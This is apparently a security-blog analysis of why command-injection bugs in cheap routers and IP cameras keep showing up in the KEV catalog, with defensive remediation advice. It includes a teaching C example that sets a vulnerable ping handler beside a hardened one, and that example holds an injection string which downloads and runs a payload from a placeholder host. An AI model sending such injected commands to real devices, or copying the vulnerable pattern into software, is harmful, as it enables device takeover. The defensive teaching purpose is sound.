PatchDay Alert
Analysis · 4 min read · 873 words By operations-desk

The catalog is full of cheap routers and cameras for one reason: they're botnet feedstock

Scroll the KEV catalog and you hit a wall of command-injection bugs in D-Link, TP-Link, DrayTek, ASUS, Netgear, and IP-camera firmware. They're not separate stories. They're the same story: internet-exposed consumer gear that gets conscripted into IoT botnets, and the fix is almost always the same.

Read enough of the Known Exploited Vulnerabilities catalog and a pattern jumps out: page after page of command-injection and authentication-bypass bugs in cheap network gear. D-Link routers, NAS boxes, and access points. TP-Link, ASUS, DrayTek, and Netgear routers. Dahua, Reolink, and Edimax IP cameras. Dasan GPON routers, Realtek and other embedded SDKs that ship inside dozens of brands. MikroTik and Cisco small-business routers. They span a decade of CVEs and a dozen vendors, and they are not separate stories. They are one story, told over and over: internet-exposed consumer and small-business devices, with weak firmware and short support lives, get conscripted into IoT botnets, and the remediation barely changes from one to the next.

Treating these as individual emergencies misses the point. Treating them as a class is how you actually defend against them.

Why this class exists

Consumer and SOHO network devices share a set of properties that make command-injection bugs both common and durable:

  • They’re built to a price. Security engineering, code review, and long-term firmware maintenance cost money that a $40 router’s margin doesn’t support. Web admin interfaces that pass user input into shell commands are endemic, which is why “OS command injection” is the single most common vuln type in this corner of the catalog.
  • They’re exposed on purpose. People forward ports or enable remote administration so they can reach the device from outside, putting the vulnerable web interface directly on the internet where mass scanners find it in minutes.
  • They go end-of-life fast and silently. A router model is sold for a couple of years and supported for a few more, then abandoned, but the hardware keeps running in homes and small offices for a decade. No more firmware, no more fixes, no auto-update.
  • Nobody patches them. There’s no IT team, no inventory, no maintenance window. The device works, so it’s forgotten until it’s part of a botnet.
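The first bullet above describes the bug class in one sentence: a web admin handler pastes form input into a shell command line. The following is an added example, written for this page and not taken from any vendor's firmware or from the original article. It shows a typical "diagnostic ping" handler in its vulnerable form beside a hardened one. All names (build_ping_cmd_vulnerable, valid_ping_target, run_ping_hardened), the /bin/ping path and the attack string are illustrative assumptions; the vulnerable function only builds the command string so the injected payload is visible without being executed.

```c
/* Added example, not vendor code: router-style "ping" handler, vulnerable
 * version beside a hardened version. Function names, the /bin/ping path and
 * the sample attack string are assumptions made for illustration. */
#include <ctype.h>
#include <stdbool.h>
#include <stdio.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* VULNERABLE: the form field "host" is concatenated into a shell line that
 * the real handler would pass to system(). Input such as
 *   8.8.8.8; wget http://example.invalid/b -O /tmp/b; sh /tmp/b
 * makes the shell run the attacker's commands as the web server's user,
 * which on consumer gear is usually root. Here we only build the string. */
size_t build_ping_cmd_vulnerable(const char *host, char *out, size_t outlen) {
    return (size_t)snprintf(out, outlen, "ping -c 1 %s > /tmp/ping.out", host);
}

/* HARDENED step 1: allow-list the input. A ping target is a hostname or an
 * IPv4 address: letters, digits, '.' and '-', length-limited, and not
 * starting with '-' (that would be parsed as a ping option). Every shell
 * metacharacter fails this check before any process is started. */
bool valid_ping_target(const char *host) {
    size_t n = strlen(host);
    if (n == 0 || n > 253) return false;
    if (host[0] == '-') return false;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)host[i];
        if (!(isalnum(c) || c == '.' || c == '-')) return false;
    }
    return true;
}

/* HARDENED step 2: never hand the string to a shell. fork/execv with an
 * argv array means the target is exactly one argument to ping, whatever
 * characters it contains. Returns ping's exit status, or -1 for invalid
 * input, fork failure, or a child that did not exit normally. */
int run_ping_hardened(const char *host) {
    if (!valid_ping_target(host)) return -1;   /* rejected before fork */
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = {"ping", "-c", "1", (char *)host, NULL};
        execv("/bin/ping", argv);              /* path is an assumption */
        _exit(127);                            /* exec failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void) {
    /* Constructed attack input, the kind mass scanners send to these UIs. */
    const char *attack = "8.8.8.8; wget http://example.invalid/b -O /tmp/b; sh /tmp/b";
    char cmd[256];
    build_ping_cmd_vulnerable(attack, cmd, sizeof cmd);
    printf("vulnerable handler would run: %s\n", cmd);
    printf("hardened handler accepts attack input: %s\n",
           valid_ping_target(attack) ? "yes" : "no");
    printf("hardened handler accepts 192.168.1.1: %s\n",
           valid_ping_target("192.168.1.1") ? "yes" : "no");
    return 0;
}
```

The two hardening steps are independent and both matter: the allow-list stops the injected text at the door, and execv() removes the shell so that even a gap in the allow-list cannot turn an argument into a command. Most of the catalog's router entries fail both.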

The result is a vast, stable population of vulnerable internet-connected devices, which is exactly what botnet operators want. Since Mirai weaponized cameras and routers at scale in 2016, this gear has been the feedstock for DDoS botnets, for proxy and relay networks (operational relay boxes, or ORBs) that launder criminal and nation-state traffic, and for footholds into the small networks the devices sit on. The KEV catalog keeps adding these CVEs because they keep getting exploited, by the same opportunistic, mass-scanning playbook each time.

The remediation is the same almost every time

Because the class is uniform, so is the defense. Whatever the specific vendor and CVE, the actions are:

  • Take the device’s management interface off the internet. Disable remote administration, UPnP, and port forwarding to the admin UI. The overwhelming majority of this exploitation requires reaching a web interface that should never have been internet-facing. This one control defuses most of the catalog’s router and camera entries at once.
  • Replace end-of-life hardware. If the vendor no longer ships firmware for the device, there is no patch coming, ever. EOL edge gear is a liability with no remediation path but replacement. Budget for it as a lifecycle cost.
  • Update firmware on supported devices, and turn on auto-update if offered. For gear that’s still maintained, applying firmware closes the known bugs. Most owners never check, so make it deliberate.
  • Change default credentials and disable unused services. Many of these bugs are only reachable, or far more damaging, when default or weak credentials are in place and unnecessary services (Telnet, UPnP, TR-069, cloud remote access) are enabled. Hardening the basics shrinks the surface.
  • Segment IoT and edge devices. A compromised camera or router shouldn’t have a flat path to anything that matters. Put IoT on its own VLAN/SSID, away from the systems and data you care about.

For the people who manage many of these

The hardest-hit are home users and small businesses without IT, and the MSPs who serve them. If that’s you:

  • Inventory the edge. You can’t replace or patch what you don’t know is there. Catalog the routers, cameras, NAS boxes, and access points across your sites and clients.
  • Standardize and lifecycle. A small set of supported, current device models is far easier to patch and retire on schedule than a zoo of whatever was cheapest. Track end-of-life dates and replace ahead of them.
  • Make “no admin interface on the WAN” a baseline. Audit for exposed device management and remote-admin features; it’s the highest-value, lowest-cost control across the whole class.

The reframe is to stop reading these as a stream of unrelated CVEs and start reading them as a category with a category-level answer. A new D-Link or TP-Link or camera command-injection bug isn't news; it's the same vulnerability class reappearing, and your posture (get it off the internet, replace it if it's dead, segment the rest) defends against the next one as well as this one. The catalog will keep adding cheap-device bugs forever. You don't have to chase them one by one if the gear isn't reachable from the internet and isn't past end of life. We track this whole class as one ongoing pattern, because that's exactly what it is.
